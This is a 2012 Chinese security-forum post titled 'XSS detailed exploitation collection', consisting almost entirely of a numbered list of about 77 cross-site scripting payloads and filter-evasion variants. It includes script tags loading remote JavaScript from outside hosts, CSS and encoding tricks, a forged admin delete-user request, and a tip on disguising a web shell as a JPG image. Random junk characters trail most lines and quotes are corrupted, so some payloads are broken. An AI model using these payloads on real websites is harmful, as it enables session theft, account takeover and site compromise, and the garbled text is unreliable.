找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2255|回复: 0
打印 上一主题 下一主题

xss详细利用大全1

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:04:56 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
跨站图片shell! T4 g  I/ w9 z) r9 R( c
XSS跨站代码  <script>alert("")</script>
! V2 ?, Z+ X  Y4 d' y9 ?# Z: X* D4 A( L# b
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
* r! f$ f! C" ~! }% `: F
7 E& X1 z: i# N* }5 S2 s  Q9 J+ z# c, E) \7 F* k% w) L' `4 K0 F/ \, t
7 `& K* X% H' h
1)普通的XSS JavaScript注入
5 a9 x1 l0 ?2 l  ~0 W7 i& L<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& r2 R! ?9 J' O+ O% h' i1 w! f7 \* E! H5 S2 c; t/ |
(2)IMG标签XSS使用JavaScript命令
  g( M7 j8 \- W# |) S( a5 y<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ F! o' x. j. d  I* @+ K! o; G% v* Q
$ X8 T/ X/ ~  l! Z* d0 \
(3)IMG标签无分号无引号8 l( u, [) D# ]$ |6 N
<IMG SRC=javascript:alert(‘XSS’)>
. _7 s( }% ^, f; c/ P8 ~, l  `) Y  R
(4)IMG标签大小写不敏感
8 n9 M. Z) l* }<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
" p# S0 @/ A5 ^; l  h+ i. W, Z5 A4 N! h; ^, m6 n0 ~
(5)HTML编码(必须有分号)
8 j" {3 q; i- y! {- C' Q6 m' Y7 z<IMG SRC=javascript:alert(“XSS”)>3 I8 z& a  n% S5 X% {

, r2 `5 r& B! K: P& s(6)修正缺陷IMG标签
4 H8 R! u# Z6 n0 I, G<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>& ~. i9 g4 q" d% [9 o, O/ [
5 @7 x+ z7 p) @! ?1 r
(7)formCharCode标签(计算器)
% x; u3 f# P8 s# P  P) }<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>) \& G* g" C$ i3 `. Y

4 d2 c3 C0 o0 w1 `* N4 H7 b$ n(8)UTF-8的Unicode编码(计算器)
; b5 M1 v/ W9 |, k" W: f  J5 `<IMG SRC=jav..省略..S')>2 h: g% l  ]& `# E
6 z- n. B  a" Z) }, X2 G# ^
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
4 a1 U, M3 t4 b$ B$ m2 x<IMG SRC=jav..省略..S')>
3 n1 n. r4 B: [+ X8 ^$ S' z# S$ q- i& o7 u) d) I2 c
(10)十六进制编码也是没有分号(计算器)$ _) ?' A- h1 @' U: ^- h
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
1 |! Q4 t3 v& h" l3 M1 e* O: Z; f6 i2 D, g
(11)嵌入式标签,将Javascript分开
: y: H2 u! B8 W  |* P/ j<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ D$ q3 \' V4 V6 l4 o+ U
2 R6 c" m& [$ @5 W% v- X(12)嵌入式编码标签,将Javascript分开+ Q' i2 ]+ t! L+ Y$ y
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 v7 A9 Y" A% J- W0 O3 y. Y3 N1 R+ H
(13)嵌入式换行符
. _' I5 A& [0 h8 n/ s+ _/ o: W5 O<IMG SRC=”jav ascript:alert(‘XSS’);”>
% F. ~5 d& E: z) x. B. U% ~
$ ^( s7 h3 ^4 ~  l, K; M7 C(14)嵌入式回车
1 R) k0 }" K2 B& b<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 ?- h1 C$ e& \  Y8 L4 {% o$ R8 {0 x4 g$ V! q: l$ _3 D
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
7 x2 K$ p* ]6 P+ ?<IMG SRC=”javascript:alert(‘XSS‘)”>
) @4 x$ Z9 j' q8 X
2 O( ?4 g0 ]7 b(16)解决限制字符(要求同页面)
" A0 }2 X, P" C, }( m" F* l<script>z=’document.’</script>' [* h* ?& F# r
<script>z=z+’write(“‘</script>
( G4 D; o, D: c* d) p6 {6 I<script>z=z+’<script’</script>1 c& F- r0 F7 C; Z7 Z: F  H2 \7 q
<script>z=z+’ src=ht’</script>$ m2 p* [  @$ O* |
<script>z=z+’tp://ww’</script>
8 K/ V! u2 C0 b9 w( j! f6 n<script>z=z+’w.shell’</script>
/ I* b( [3 d, \5 H0 W, T( L<script>z=z+’.net/1.’</script>: E8 f( P' |1 D$ m0 {; L
<script>z=z+’js></sc’</script>, v% T4 L$ i! I" u8 Y
<script>z=z+’ript>”)’</script>" P4 X8 ]2 @( O* R+ Y  _& p
<script>eval_r(z)</script>
& O; u/ g5 o+ B9 U/ Z1 h- U- f4 o' F4 @7 I# |2 v! \# O
(17)空字符
- Z5 ]' L: M( g( G" Aperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
5 E5 X* I/ ?3 K& Y1 a, f* X& C& W, O  g& g8 Z
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用' m# j' J! d) i/ y8 N5 L: \
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out9 J- l6 G1 s( r& [
  l7 u# [& A8 `, H
(19)Spaces和meta前的IMG标签
/ p4 B" G7 P+ ]' ]3 s& E<IMG SRC=” javascript:alert(‘XSS’);”>
: ^8 g. @4 H) F* y% f1 q
% ]! [3 g7 P9 T7 [(20)Non-alpha-non-digit XSS
/ T) w1 y: J" ~& @0 L+ T<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
  N( k% Y9 D$ a' P3 G6 t6 _! F, `; m* j
(21)Non-alpha-non-digit XSS to 2
( C0 P# k! J8 v" Z<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>7 y9 P4 M) _! `- ?' ^8 V4 p* V

) f4 e+ o! z# j  [- E0 c6 j1 y(22)Non-alpha-non-digit XSS to 3
* a1 l$ I. \/ Z: g" y<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>- z- C; B+ G0 G( B! I9 H- g( f) V

. `$ T  ?6 ?/ R(23)双开括号6 t+ v4 u+ W! z  y! `3 i
<<SCRIPT>alert(“XSS”);//<</SCRIPT>9 S: u: X! h& d' i# a$ P

: G! }, _" B; A8 A  k(24)无结束脚本标记(仅火狐等浏览器)) H: {9 p1 Y* |# [
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>& W! E) T5 Q4 R: R6 K
* d0 u9 O1 ?% d7 m* `5 N9 x. g
(25)无结束脚本标记2
7 {! F7 `! \' J8 T6 k<SCRIPT SRC=//3w.org/XSS/xss.js>" J4 I2 L# ?- T

* ]: h; K% ?+ z3 e3 z(26)半开的HTML/JavaScript XSS
$ i4 I$ n& A$ ^, O6 E' f; n/ j<IMG SRC=”javascript:alert(‘XSS’)”% G; M/ V# Q3 F, w

( v' j3 x& v5 h1 K  E9 Y0 K(27)双开角括号
: q5 P% j" M+ `& J# w: b1 Q4 \<iframe src=http://3w.org/XSS.html <* P1 B3 e9 d! ~. J

: g2 v9 O9 N: E" p4 F- h+ R(28)无单引号 双引号 分号
+ j) W2 s/ ^: u8 A0 b<SCRIPT>a=/XSS/* k% h6 O8 }. e8 k) V
alert(a.source)</SCRIPT>8 h! w: r' {7 ?% `  q9 Q9 p' o
2 n( J) I1 e$ }  f* P8 n7 s' _% ]5 P
(29)换码过滤的JavaScript4 T, l) i! @" ~# _
\”;alert(‘XSS’);//
% v; J: ^; c1 Z# e8 z# E7 C% G% D- A) O  J1 `0 f  q
(30)结束Title标签
  e% }7 {8 E9 V* h' p7 B</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>- L' ^& ]. L) U  R

9 C& E- O. W& z(31)Input Image
2 C3 N, W$ t' {* ]- B# {<INPUT SRC=”javascript:alert(‘XSS’);”>* t, u# B) p& k0 V
1 w5 H: Q8 I$ w' v+ a
(32)BODY Image! a) w7 _7 ~* W! `8 [6 T
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>$ ]5 i+ m9 F" C- Q9 |% ~: E$ \5 B" S, r
) w8 J' w. X) J$ E" i4 C6 P' j1 V* B
(33)BODY标签
! z( Q9 ]4 l( O" v, P, A<BODY(‘XSS’)>5 m5 c# S; s, \6 R! ]! {1 c
9 D4 q) b9 m& a9 a: i) k
(34)IMG Dynsrc# ?$ ?$ e/ s; t
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
8 r- z5 D4 L2 Q8 ^' W; ?2 S: N8 Z1 _6 ?  g  i+ D/ |
(35)IMG Lowsrc
' \! G# x+ Y8 q' ]+ @+ a<IMG LOWSRC=”javascript:alert(‘XSS’)”>% _3 O* w1 v( b% K

' s5 c- P, N3 d0 l: p0 b; j( V1 D(36)BGSOUND
- z+ ^9 u2 M3 D/ M, p9 l<BGSOUND SRC=”javascript:alert(‘XSS’);”>5 q) K& M" W' {) f- I* a+ `5 h

+ r: @1 f1 G6 N0 q, O+ l4 G$ a(37)STYLE sheet
- m% T  w* [3 l& i) Y: d1 A<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
1 g( F; f* m  ^( ]
9 I( g2 l4 E. o8 G) f(38)远程样式表
7 \5 A. k5 S) z1 G2 x( x2 @) d# R  ?<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
/ e5 ^; N# D1 s' u: r' _- I- z$ e+ |6 ^  x! c
(39)List-style-image(列表式)
7 E. V  z& p9 w<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
; B6 E3 I7 R: g
& @# n2 E! _7 q! t(40)IMG VBscript
* a4 }$ W5 F& q8 R$ R( M0 [' U5 M: a<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
7 w5 r0 B: L, [7 J# ~3 X4 H% d/ D
' H" h2 X/ y$ J) ?4 M$ B(41)META链接url
& A& L* j$ v+ }4 G$ _% ?<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>4 V& ~" P2 d6 q$ s

& R( n: z( {7 r1 C" }9 ](42)Iframe5 g7 o+ A0 o$ N2 V
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>$ u  z  {  i( Y7 H7 x- Q! i- `
(43)Frame
, }( Q1 [% J2 x% r<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
; l. i" l. e/ C: r3 y
; R5 i$ ]  k4 I& @* c2 N/ a1 R(44)Table
( Z/ ~3 l7 c; V$ D6 e8 a<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
4 e8 Z  c0 R6 R( [# T) D
0 f8 Y' L2 \/ y3 f7 L1 F- `7 S9 X(45)TD
! C) l) Y: E: A8 u<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>; i. g* }9 {0 T* t) e$ j% P

" f' \- A) B0 G! ?4 g" k# @! a(46)DIV background-image
+ f! j( W% V8 J/ ]& Y  F( W<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
7 F9 X3 ?6 A9 x9 J) R$ A8 Z4 K" J- a" d6 [( A
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)& f) q( d5 _1 B
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>7 t. ?" b, o7 f- a

/ p5 D) x0 H. k& u6 a- w; I(48)DIV expression8 x0 d$ d2 O( f/ @. b5 `
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
: u4 C6 C1 p" |, e) {; D+ _' P! e0 H5 x% b$ Z( ?4 p' j
(49)STYLE属性分拆表达1 F, f, ?" B; C; L
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>4 b; g% |2 t* I
8 e6 K: }9 @. s: D3 J+ V6 {$ w0 W
(50)匿名STYLE(组成:开角号和一个字母开头)
4 n* C0 t0 r3 w& S. y* C. {<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>& S) {4 G6 U2 V1 m

9 H9 y: c5 j8 R# X3 ]( m(51)STYLE background-image) F0 W5 d4 ^0 N9 [. W0 I, \4 e5 C9 q
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>9 F* R2 [/ m8 U. E  l5 G

( ^6 G" S* M+ `$ Q(52)IMG STYLE方式
. Q! Y) e; N/ ~0 oexppression(alert(“XSS”))’>
# y! `% ^% w/ a3 d/ Y4 L
: ~& {# ]% z* v8 q! ]; G(53)STYLE background
/ E& D7 X' }$ G- G* N' W8 G$ P<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
2 q* q4 J! r  z& M' M5 c* q( R3 G3 M! O" j: b
(54)BASE
, N) D: {' o' s, p<BASE HREF=”javascript:alert(‘XSS’);//”>2 r% h/ S  h1 U0 T* c7 b/ b" H
4 {) P8 M" i3 S/ l/ L, m! N
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS3 {! k& a6 U5 `: w  {% |. F
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
5 ]0 S2 P! V7 I/ x3 ~" O- {+ P$ Y6 R' M4 Z: ~! p% K. D' C! E. j
(56)在flash中使用ActionScrpt可以混进你XSS的代码
7 d/ B. _9 ^+ i- {a=”get”;4 l4 h/ p# |$ ?) C  B4 i: U
b=”URL(\”";
# g4 l" d7 q0 `: z& t: c0 V9 uc=”javascript:”;
& r" {& q3 w0 f) X# cd=”alert(‘XSS’);\”)”;
5 J4 u- I* w) S% reval_r(a+b+c+d);  n! W1 L: W5 P4 Y4 ~" f5 @) e& U
, b7 R7 P* G* F4 C1 s+ k+ n$ y
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
1 O! C/ l+ @  [5 x: `; {; U<HTML xmlns:xss>
' N# L+ z& V0 ~# Q! R<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>$ i! G# W2 Z; T9 y* P) E
<xss:xss>XSS</xss:xss># R7 N6 J4 L: ?9 ~, ]0 w
</HTML>
# W5 z( b0 z/ \5 m% p. C  [8 C7 e& {, r3 M7 e2 |
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
' I) V0 H6 k' A8 K7 a<SCRIPT SRC=””></SCRIPT>
( k/ k% o( V, ]- e) i8 r* q1 y: R+ c7 ?* `
(59)IMG嵌入式命令,可执行任意命令
# `9 X5 d& }, \<IMG SRC=”http://www.XXX.com/a.php?a=b”>1 u4 d* R* T( z( a, D" A! Z

! F# [7 {9 o. f" l) V/ `. Y(60)IMG嵌入式命令(a.jpg在同服务器)
) W3 b$ N4 V; K4 g; A4 Q0 vRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser1 E1 a4 H$ u1 H) n3 [2 g! l

1 M( t* j  ^6 Q7 Q0 l(61)绕符号过滤6 @$ W4 ^- H3 d* \
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>' H$ i4 A. z6 {4 q  x

' x, d; n2 D* t(62). A! O) F! c) u
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 O: a3 d  K$ [! m

9 Y# n6 v5 h6 W' P(63)2 z4 M. F/ r9 ^# ~+ y  h
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>8 s! j. |3 m3 A+ n! S$ M8 {6 \
" x% S  \7 S: @$ ]( h: |: u
(64)
! U0 t, h& x0 ~4 f9 G<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>7 d* b/ J$ I' w' _" G. N/ v
, K  k" T7 I9 F: }2 }- H
(65)
7 y0 }3 r1 A  g+ `$ D0 w- K  o' W0 g& [<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>! e) @7 Q% j2 P8 r# c' [
  ]: u$ y9 {% i  ~" k6 N- }, S
(66): N; {1 ]0 \. k4 p
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
+ r/ y0 f9 K* t! R1 @' o/ D" V$ a" ]( U( @/ J
(67)
( C! I* g! |; F/ _( l3 X: x<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>' ]7 ?4 G# q# |) }$ B
) b! L( h. J- `. ^
(68)URL绕行
, ]6 {5 t2 K7 z4 ]6 o9 N, k" d<A HREF=”http://127.0.0.1/”>XSS</A>4 T- }5 y% X+ @9 ?% r9 J' R. R! @
2 g' s9 S, c* f& g( ~( ?  b# ]
(69)URL编码
. T& J( J4 b* O<A HREF=”http://3w.org”>XSS</A>
! E: k2 F$ @: a/ N% ?6 h$ S( M( S# L8 Z3 Y/ `4 e% ]
(70)IP十进制7 c7 p8 M0 r" O( e) y
<A HREF=”http://3232235521″>XSS</A>6 u* V/ `$ Z1 p0 d. l5 q
8 V" t9 f% m9 W" j; T$ r* |( ]
(71)IP十六进制
8 I0 c3 {! y* n8 n  T% Q  Q& a% w- @<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>" L# q  |- ?; `+ o: s6 F) Q# k5 N

: j/ n  ]# x( Y(72)IP八进制# Q# O/ L* V9 |; Y- a% w
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
& D& n. S/ S: u7 i9 A. c; d+ x
$ N# p0 _( L1 y+ E# ?: q: O(73)混合编码
0 o1 t( l' S3 J, _5 J5 x<A HREF=”h1 Y9 @5 X6 n9 W/ Y5 Z+ v1 v2 m9 b0 V
tt p://6 6.000146.0×7.147/”">XSS</A>/ S1 c6 ^1 e0 k+ ~
" N# G! U2 S6 T8 v( \# N$ o
(74)节省[http:]
, c5 w& b, X: d( Q) s<A HREF=”//www.google.com/”>XSS</A>
" ]+ ~( o8 e2 a9 G$ U' Z7 B8 _5 _+ j# R+ k  r: w+ J& d
(75)节省[www]
4 z7 l, E+ Y* X* y' j+ h; c<A HREF=”http://google.com/”>XSS</A>% }& E4 `7 x! O  n& A
$ M: `' r9 K* G% J
(76)绝对点绝对DNS
% P3 R9 a7 n# G* f( m' c<A HREF=”http://www.google.com./”>XSS</A>
3 ~/ m2 @( A# D0 V1 k& ~1 w$ c8 k: @- J- u: M& |8 J* X. |/ k( U
(77)javascript链接& c$ @% P9 @; o: n' i* t- V# n
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>0 @: j. }& I0 @6 g6 }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表